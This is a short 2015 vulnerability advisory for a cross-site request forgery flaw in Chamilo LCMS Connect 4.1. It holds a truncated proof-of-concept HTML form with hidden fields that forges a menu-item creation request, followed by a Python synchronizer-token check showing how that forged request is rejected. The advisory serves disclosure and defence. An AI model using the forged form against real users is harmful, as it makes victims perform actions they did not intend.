Chamilo LCMS Connect 4.1 Cross Site Request Forgery

Type packetstorm
Reporter Vadodil Joel Varghese
Modified 2015-03-27T00:00:00


Hi Team,  
#Affected Vendor:  
#Date: 27/03/2015  
#Discovered by: Joel Vadodil Varghese  
#Type of vulnerability: XSRF  
#Tested on: Windows 7  
#Product: LCMS Connect  
#Version: 4.1  
#Description: Chamilo is an open-source (under GNU/GPL licensing)  
e-learning and content management system, aimed at improving access to  
education and knowledge globally. Chamilo LCMS is a completely new software  
platform for e-learning and collaboration. The application is vulnerable to  
XSRF attacks. If an attacker is able to lure a user into clicking a crafted  
link, or embeds such a link within web pages, he could control the  
user's actions.  
#Proof of Concept (PoC):  
<form method="POST" name="form1" action="  
<input type="hidden" name="parent" value="0"/>  
<input type="hidden" name="title[de]" value=""/>  
<input type="hidden" name="title[en]" value="tester"/>  
<input type="hidden" name="title[fr]" value=""/>  
<input type="hidden" name="title[nl]" value=""/>  
<input type="hidden" name="application" value="weblcms"/>  
<input type="hidden" name="submit_button" value="Create"/>  
<input type="hidden" name="_qf__item" value=""/>  
<input type="hidden" name="type" value="core\menu\ApplicationItem"/>  
*Joel V*
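A synchronizer-token check of the kind that stops the forged POST above, written here as an added Python example rather than Chamilo's own code; the `csrf_token` field name, the in-memory session store and the handler shape are assumptions:

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlencode

# Constructed in-memory session store: session id -> per-session CSRF token.
# A real deployment keeps this server-side alongside the login session.
SESSIONS = {}

def new_session():
    """Create a session and mint a random, unguessable synchronizer token for it."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = secrets.token_urlsafe(32)
    return sid

def csrf_token_for(sid):
    """Token the legitimate form embeds as a hidden field (assumed name: csrf_token)."""
    return SESSIONS[sid]

def handle_create_item(sid, body):
    """Server side of the 'Create' menu item POST from the advisory; returns (status, message).
    Rejects the request unless the body carries the token bound to the caller's session."""
    fields = parse_qs(body, keep_blank_values=True)
    submitted = fields.get("csrf_token", [""])[0]
    expected = SESSIONS.get(sid)
    # constant-time comparison on bytes, so the check neither leaks timing nor
    # raises on a non-ASCII value an attacker might submit
    if expected is None or not hmac.compare_digest(submitted.encode(), expected.encode()):
        return 403, "rejected: CSRF token missing or invalid"
    if fields.get("submit_button", [""])[0] != "Create":
        return 400, "rejected: unexpected submit_button"
    title = fields.get("title[en]", [""])[0]
    item_type = fields.get("type", [""])[0]
    return 200, f"created menu item '{title}' of type {item_type}"

# The hidden fields of the advisory's PoC form, as a cross-site page would submit them (no token).
FORGED_FIELDS = {
    "parent": "0", "title[de]": "", "title[en]": "tester", "title[fr]": "",
    "title[nl]": "", "application": "weblcms", "submit_button": "Create",
    "_qf__item": "", "type": r"core\menu\ApplicationItem",
}

def demo():
    """Forged POST is refused; the same fields plus the session's token are accepted."""
    sid = new_session()
    forged = handle_create_item(sid, urlencode(FORGED_FIELDS))
    legit = handle_create_item(sid, urlencode({**FORGED_FIELDS, "csrf_token": csrf_token_for(sid)}))
    wrong = handle_create_item(sid, urlencode({**FORGED_FIELDS, "csrf_token": "guess"}))
    return forged[0], legit[0], wrong[0]  # (403, 200, 403)
```

Because the token is bound to the victim's session and never readable cross-origin, a page the attacker controls cannot produce an accepted request even though it knows every other field.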